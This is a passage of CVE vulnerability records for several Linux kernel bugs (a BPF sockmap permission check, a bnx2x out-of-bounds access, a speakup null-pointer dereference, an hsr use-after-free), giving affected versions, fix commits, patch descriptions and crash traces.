"versionStartIncluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "6.1.85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "6.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.8.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Allow delete from sockmap/sockhash only if update is allowed\n\nWe have seen an influx of syzkaller reports where a BPF program attached to\na tracepoint triggers a locking rule violation by performing a map_delete\non a sockmap/sockhash.\n\nWe don\u0027t intend to support this artificial use scenario. Extend the\nexisting verifier allowed-program-type check for updating sockmap/sockhash\nto also cover deleting from a map.\n\nFrom now on only BPF programs which were previously allowed to update\nsockmap/sockhash can delete from these map types."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:56.599Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/29467edc23818dc5a33042ffb4920b49b090e63d"
},
{
"url": "https://git.kernel.org/stable/c/11e8ecc5b86037fec43d07b1c162e233e131b1d9"
},
{
"url": "https://git.kernel.org/stable/c/6693b172f008846811f48a099f33effc26068e1e"
},
{
"url": "https://git.kernel.org/stable/c/000a65bf1dc04fb2b65e2abf116f0bc0fc2ee7b1"
},
{
"url": "https://git.kernel.org/stable/c/b81e1c5a3c70398cf76631ede63a03616ed1ba3c"
},
{
"url": "https://git.kernel.org/stable/c/98e948fb60d41447fd8d2d0c3b8637fc6b6dc26d"
}
],
"title": "bpf: Allow delete from sockmap/sockhash only if update is allowed",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38662",
"datePublished": "2024-06-21T11:15:12.202Z",
"dateReserved": "2024-06-21T10:12:11.509Z",
"dateUpdated": "2025-05-04T12:56:56.599Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42148 (GCVE-0-2024-42148)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bnx2x: Fix multiple UBSAN array-index-out-of-bounds
Fix UBSAN warnings that occur when using a system with 32 physical
cpu cores or more, or when the user defines a number of Ethernet
queues greater than or equal to FP_SB_MAX_E1x using the num_queues
module parameter.
Currently there is a read/write out of bounds that occurs on the array
"struct stats_query_entry query" present inside the "bnx2x_fw_stats_req"
struct in "drivers/net/ethernet/broadcom/bnx2x/bnx2x.h".
Looking at the definition of the "struct stats_query_entry query" array:
struct stats_query_entry query[FP_SB_MAX_E1x+
BNX2X_FIRST_QUEUE_QUERY_IDX];
FP_SB_MAX_E1x is defined as the maximum number of fast path interrupts and
has a value of 16, while BNX2X_FIRST_QUEUE_QUERY_IDX has a value of 3
meaning the array has a total size of 19.
Since accesses to "struct stats_query_entry query" are offset-ted by
BNX2X_FIRST_QUEUE_QUERY_IDX, that means that the total number of Ethernet
queues should not exceed FP_SB_MAX_E1x (16). However one of these queues
is reserved for FCOE and thus the number of Ethernet queues should be set
to [FP_SB_MAX_E1x -1] (15) if FCOE is enabled or [FP_SB_MAX_E1x] (16) if
it is not.
This is also described in a comment in the source code in
drivers/net/ethernet/broadcom/bnx2x/bnx2x.h just above the Macro definition
of FP_SB_MAX_E1x. Below is the part of this explanation that it important
for this patch
/*
* The total number of L2 queues, MSIX vectors and HW contexts (CIDs) is
* control by the number of fast-path status blocks supported by the
* device (HW/FW). Each fast-path status block (FP-SB) aka non-default
* status block represents an independent interrupts context that can
* serve a regular L2 networking queue. However special L2 queues such
* as the FCoE queue do not require a FP-SB and other components like
* the CNIC may consume FP-SB reducing the number of possible L2 queues
*
* If the maximum number of FP-SB available is X then:
* a. If CNIC is supported it consumes 1 FP-SB thus the max number of
* regular L2 queues is Y=X-1
* b. In MF mode the actual number of L2 queues is Y= (X-1/MF_factor)
* c. If the FCoE L2 queue is supported the actual number of L2 queues
* is Y+1
* d. The number of irqs (MSIX vectors) is either Y+1 (one extra for
* slow-path interrupts) or Y+2 if CNIC is supported (one additional
* FP interrupt context for the CNIC).
* e. The number of HW context (CID count) is always X or X+1 if FCoE
* L2 queue is supported. The cid for the FCoE L2 queue is always X.
*/
However this driver also supports NICs that use the E2 controller which can
handle more queues due to having more FP-SB represented by FP_SB_MAX_E2.
Looking at the commits when the E2 support was added, it was originally
using the E1x parameters: commit f2e0899f0f27 ("bnx2x: Add 57712 support").
Back then FP_SB_MAX_E2 was set to 16 the same as E1x. However the driver
was later updated to take full advantage of the E2 instead of having it be
limited to the capabilities of the E1x. But as far as we can tell, the
array "stats_query_entry query" was still limited to using the FP-SB
available to the E1x cards as part of an oversignt when the driver was
updated to take full advantage of the E2, and now with the driver being
aware of the greater queue size supported by E2 NICs, it causes the UBSAN
warnings seen in the stack traces below.
This patch increases the size of the "stats_query_entry query" array by
replacing FP_SB_MAX_E1x with FP_SB_MAX_E2 to be large enough to handle
both types of NICs.
Stack traces:
UBSAN: array-index-out-of-bounds in
drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c:1529:11
index 20 is out of range for type 'stats_query_entry [19]'
CPU: 12 PID: 858 Comm: systemd-network Not tainted 6.9.0-060900rc7-generic
#202405052133
Hardware name: HP ProLiant DL360 Gen9/ProLiant DL360
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 Version: 50f0a562f8cc9ed9d9f7f7380434c3c8646172d5 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.025Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfb04472ce33bee2579caf4dc9f4242522f6e26e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cbe53087026ad929cd3950508397e8892a6a2a0f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b17cec33892a66bbd71f8d9a70a45e2072ae84f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0edae06b4c227bcfaf3ce21208d49191e1009d3b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9504a1550686f53b0bab4cab31d435383b1ee2ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f1313ea92f82451923e28ab45a4aaa0e70e80b98"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9ea38e767459111a511ed4fb74abc37db95a59d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/134061163ee5ca4759de5c24ca3bd71608891ba7"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42148",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:34.762201Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:34.889Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnx2x/bnx2x.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cfb04472ce33bee2579caf4dc9f4242522f6e26e",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
},
{
"lessThan": "cbe53087026ad929cd3950508397e8892a6a2a0f",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
},
{
"lessThan": "8b17cec33892a66bbd71f8d9a70a45e2072ae84f",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
},
{
"lessThan": "0edae06b4c227bcfaf3ce21208d49191e1009d3b",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
},
{
"lessThan": "9504a1550686f53b0bab4cab31d435383b1ee2ce",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
},
{
"lessThan": "f1313ea92f82451923e28ab45a4aaa0e70e80b98",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
},
{
"lessThan": "b9ea38e767459111a511ed4fb74abc37db95a59d",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
},
{
"lessThan": "134061163ee5ca4759de5c24ca3bd71608891ba7",
"status": "affected",
"version": "50f0a562f8cc9ed9d9f7f7380434c3c8646172d5",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnx2x/bnx2x.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnx2x: Fix multiple UBSAN array-index-out-of-bounds\n\nFix UBSAN warnings that occur when using a system with 32 physical\ncpu cores or more, or when the user defines a number of Ethernet\nqueues greater than or equal to FP_SB_MAX_E1x using the num_queues\nmodule parameter.\n\nCurrently there is a read/write out of bounds that occurs on the array\n\"struct stats_query_entry query\" present inside the \"bnx2x_fw_stats_req\"\nstruct in \"drivers/net/ethernet/broadcom/bnx2x/bnx2x.h\".\nLooking at the definition of the \"struct stats_query_entry query\" array:\n\nstruct stats_query_entry query[FP_SB_MAX_E1x+\n BNX2X_FIRST_QUEUE_QUERY_IDX];\n\nFP_SB_MAX_E1x is defined as the maximum number of fast path interrupts and\nhas a value of 16, while BNX2X_FIRST_QUEUE_QUERY_IDX has a value of 3\nmeaning the array has a total size of 19.\nSince accesses to \"struct stats_query_entry query\" are offset-ted by\nBNX2X_FIRST_QUEUE_QUERY_IDX, that means that the total number of Ethernet\nqueues should not exceed FP_SB_MAX_E1x (16). However one of these queues\nis reserved for FCOE and thus the number of Ethernet queues should be set\nto [FP_SB_MAX_E1x -1] (15) if FCOE is enabled or [FP_SB_MAX_E1x] (16) if\nit is not.\n\nThis is also described in a comment in the source code in\ndrivers/net/ethernet/broadcom/bnx2x/bnx2x.h just above the Macro definition\nof FP_SB_MAX_E1x. Below is the part of this explanation that it important\nfor this patch\n\n/*\n * The total number of L2 queues, MSIX vectors and HW contexts (CIDs) is\n * control by the number of fast-path status blocks supported by the\n * device (HW/FW). Each fast-path status block (FP-SB) aka non-default\n * status block represents an independent interrupts context that can\n * serve a regular L2 networking queue. However special L2 queues such\n * as the FCoE queue do not require a FP-SB and other components like\n * the CNIC may consume FP-SB reducing the number of possible L2 queues\n *\n * If the maximum number of FP-SB available is X then:\n * a. If CNIC is supported it consumes 1 FP-SB thus the max number of\n * regular L2 queues is Y=X-1\n * b. In MF mode the actual number of L2 queues is Y= (X-1/MF_factor)\n * c. If the FCoE L2 queue is supported the actual number of L2 queues\n * is Y+1\n * d. The number of irqs (MSIX vectors) is either Y+1 (one extra for\n * slow-path interrupts) or Y+2 if CNIC is supported (one additional\n * FP interrupt context for the CNIC).\n * e. The number of HW context (CID count) is always X or X+1 if FCoE\n * L2 queue is supported. The cid for the FCoE L2 queue is always X.\n */\n\nHowever this driver also supports NICs that use the E2 controller which can\nhandle more queues due to having more FP-SB represented by FP_SB_MAX_E2.\nLooking at the commits when the E2 support was added, it was originally\nusing the E1x parameters: commit f2e0899f0f27 (\"bnx2x: Add 57712 support\").\nBack then FP_SB_MAX_E2 was set to 16 the same as E1x. However the driver\nwas later updated to take full advantage of the E2 instead of having it be\nlimited to the capabilities of the E1x. But as far as we can tell, the\narray \"stats_query_entry query\" was still limited to using the FP-SB\navailable to the E1x cards as part of an oversignt when the driver was\nupdated to take full advantage of the E2, and now with the driver being\naware of the greater queue size supported by E2 NICs, it causes the UBSAN\nwarnings seen in the stack traces below.\n\nThis patch increases the size of the \"stats_query_entry query\" array by\nreplacing FP_SB_MAX_E1x with FP_SB_MAX_E2 to be large enough to handle\nboth types of NICs.\n\nStack traces:\n\nUBSAN: array-index-out-of-bounds in\n drivers/net/ethernet/broadcom/bnx2x/bnx2x_stats.c:1529:11\nindex 20 is out of range for type \u0027stats_query_entry [19]\u0027\nCPU: 12 PID: 858 Comm: systemd-network Not tainted 6.9.0-060900rc7-generic\n\t #202405052133\nHardware name: HP ProLiant DL360 Gen9/ProLiant DL360 \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:09.076Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cfb04472ce33bee2579caf4dc9f4242522f6e26e"
},
{
"url": "https://git.kernel.org/stable/c/cbe53087026ad929cd3950508397e8892a6a2a0f"
},
{
"url": "https://git.kernel.org/stable/c/8b17cec33892a66bbd71f8d9a70a45e2072ae84f"
},
{
"url": "https://git.kernel.org/stable/c/0edae06b4c227bcfaf3ce21208d49191e1009d3b"
},
{
"url": "https://git.kernel.org/stable/c/9504a1550686f53b0bab4cab31d435383b1ee2ce"
},
{
"url": "https://git.kernel.org/stable/c/f1313ea92f82451923e28ab45a4aaa0e70e80b98"
},
{
"url": "https://git.kernel.org/stable/c/b9ea38e767459111a511ed4fb74abc37db95a59d"
},
{
"url": "https://git.kernel.org/stable/c/134061163ee5ca4759de5c24ca3bd71608891ba7"
}
],
"title": "bnx2x: Fix multiple UBSAN array-index-out-of-bounds",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42148",
"datePublished": "2024-07-30T07:46:41.203Z",
"dateReserved": "2024-07-29T15:50:41.191Z",
"dateUpdated": "2025-05-04T09:24:09.076Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48870 (GCVE-0-2022-48870)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tty: fix possible null-ptr-defer in spk_ttyio_release
Run the following tests on the qemu platform:
syzkaller:~# modprobe speakup_audptr
input: Speakup as /devices/virtual/input/input4
initialized device: /dev/synth, node (MAJOR 10, MINOR 125)
speakup 3.1.6: initialized
synth name on entry is: (null)
synth probe
spk_ttyio_initialise_ldisc failed because tty_kopen_exclusive returned
failed (errno -16), then remove the module, we will get a null-ptr-defer
problem, as follow:
syzkaller:~# modprobe -r speakup_audptr
releasing synth audptr
BUG: kernel NULL pointer dereference, address: 0000000000000080
#PF: supervisor write access in kernel mode
#PF: error_code(0x0002) - not-present page
PGD 0 P4D 0
Oops: 0002 [#1] PREEMPT SMP PTI
CPU: 2 PID: 204 Comm: modprobe Not tainted 6.1.0-rc6-dirty #1
RIP: 0010:mutex_lock+0x14/0x30
Call Trace:
<TASK>
spk_ttyio_release+0x19/0x70 [speakup]
synth_release.part.6+0xac/0xc0 [speakup]
synth_remove+0x56/0x60 [speakup]
__x64_sys_delete_module+0x156/0x250
? fpregs_assert_state_consistent+0x1d/0x50
do_syscall_64+0x37/0x90
entry_SYSCALL_64_after_hwframe+0x63/0xcd
</TASK>
Modules linked in: speakup_audptr(-) speakup
Dumping ftrace buffer:
in_synth->dev was not initialized during modprobe, so we add check
for in_synth->dev to fix this bug.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48870",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:32.027830Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:54.375Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/accessibility/speakup/spk_ttyio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2da67bff29ab49caafb0766e8b8383b735ff796f",
"status": "affected",
"version": "4f2a81f3a88217e7340b2cab5c0a5ebd0112514c",
"versionType": "git"
},
{
"lessThan": "64152e05a4de3ebf59f1740a0985a6d5fba0c77b",
"status": "affected",
"version": "4f2a81f3a88217e7340b2cab5c0a5ebd0112514c",
"versionType": "git"
},
{
"lessThan": "5abbeebd8296c2301023b8dc4b5a6c0d5229b4f5",
"status": "affected",
"version": "4f2a81f3a88217e7340b2cab5c0a5ebd0112514c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/accessibility/speakup/spk_ttyio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: fix possible null-ptr-defer in spk_ttyio_release\n\nRun the following tests on the qemu platform:\n\nsyzkaller:~# modprobe speakup_audptr\n input: Speakup as /devices/virtual/input/input4\n initialized device: /dev/synth, node (MAJOR 10, MINOR 125)\n speakup 3.1.6: initialized\n synth name on entry is: (null)\n synth probe\n\nspk_ttyio_initialise_ldisc failed because tty_kopen_exclusive returned\nfailed (errno -16), then remove the module, we will get a null-ptr-defer\nproblem, as follow:\n\nsyzkaller:~# modprobe -r speakup_audptr\n releasing synth audptr\n BUG: kernel NULL pointer dereference, address: 0000000000000080\n #PF: supervisor write access in kernel mode\n #PF: error_code(0x0002) - not-present page\n PGD 0 P4D 0\n Oops: 0002 [#1] PREEMPT SMP PTI\n CPU: 2 PID: 204 Comm: modprobe Not tainted 6.1.0-rc6-dirty #1\n RIP: 0010:mutex_lock+0x14/0x30\n Call Trace:\n \u003cTASK\u003e\n spk_ttyio_release+0x19/0x70 [speakup]\n synth_release.part.6+0xac/0xc0 [speakup]\n synth_remove+0x56/0x60 [speakup]\n __x64_sys_delete_module+0x156/0x250\n ? fpregs_assert_state_consistent+0x1d/0x50\n do_syscall_64+0x37/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n \u003c/TASK\u003e\n Modules linked in: speakup_audptr(-) speakup\n Dumping ftrace buffer:\n\nin_synth-\u003edev was not initialized during modprobe, so we add check\nfor in_synth-\u003edev to fix this bug."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:10.981Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2da67bff29ab49caafb0766e8b8383b735ff796f"
},
{
"url": "https://git.kernel.org/stable/c/64152e05a4de3ebf59f1740a0985a6d5fba0c77b"
},
{
"url": "https://git.kernel.org/stable/c/5abbeebd8296c2301023b8dc4b5a6c0d5229b4f5"
}
],
"title": "tty: fix possible null-ptr-defer in spk_ttyio_release",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48870",
"datePublished": "2024-08-21T06:10:00.678Z",
"dateReserved": "2024-07-16T11:38:08.921Z",
"dateUpdated": "2025-05-04T08:25:10.981Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52846 (GCVE-0-2023-52846)
Vulnerability from cvelistv5
Published
2024-05-21 15:31
Modified
2025-05-04 07:44
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hsr: Prevent use after free in prp_create_tagged_frame()
The prp_fill_rct() function can fail. In that situation, it frees the
skb and returns NULL. Meanwhile on the success path, it returns the
original skb. So it's straight forward to fix bug by using the returned
value.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 451d8123f89791bb628277c0bdb4cae34a3563e6 Version: 451d8123f89791bb628277c0bdb4cae34a3563e6 Version: 451d8123f89791bb628277c0bdb4cae34a3563e6 Version: 451d8123f89791bb628277c0bdb4cae34a3563e6 Version: 451d8123f89791bb628277c0bdb4cae34a3563e6 Version: 451d8123f89791bb628277c0bdb4cae34a3563e6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52846",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-22T18:22:52.516858Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:22:53.490Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:36.079Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ddf4e04e946aaa6c458b8b6829617cc44af2bffd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1a485e45d24b1cd8fe834fd6f1b06e2903827da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6086258bd5ea7b5c706ff62da42b8e271b2401db"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1787b9f0729d318d67cf7c5a95f0c3dba9a7cc18"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d103fb6726904e353b4773188ee3d3acb4078363"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/876f8ab52363f649bcc74072157dfd7adfbabc0d"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_forward.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ddf4e04e946aaa6c458b8b6829617cc44af2bffd",
"status": "affected",
"version": "451d8123f89791bb628277c0bdb4cae34a3563e6",
"versionType": "git"
},
{
"lessThan": "a1a485e45d24b1cd8fe834fd6f1b06e2903827da",
"status": "affected",
"version": "451d8123f89791bb628277c0bdb4cae34a3563e6",
"versionType": "git"
},
{
"lessThan": "6086258bd5ea7b5c706ff62da42b8e271b2401db",
"status": "affected",
"version": "451d8123f89791bb628277c0bdb4cae34a3563e6",
"versionType": "git"
},
{
"lessThan": "1787b9f0729d318d67cf7c5a95f0c3dba9a7cc18",
"status": "affected",
"version": "451d8123f89791bb628277c0bdb4cae34a3563e6",
"versionType": "git"
},
{
"lessThan": "d103fb6726904e353b4773188ee3d3acb4078363",
"status": "affected",
"version": "451d8123f89791bb628277c0bdb4cae34a3563e6",
"versionType": "git"
},
{
"lessThan": "876f8ab52363f649bcc74072157dfd7adfbabc0d",
"status": "affected",
"version": "451d8123f89791bb628277c0bdb4cae34a3563e6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_forward.c"
],
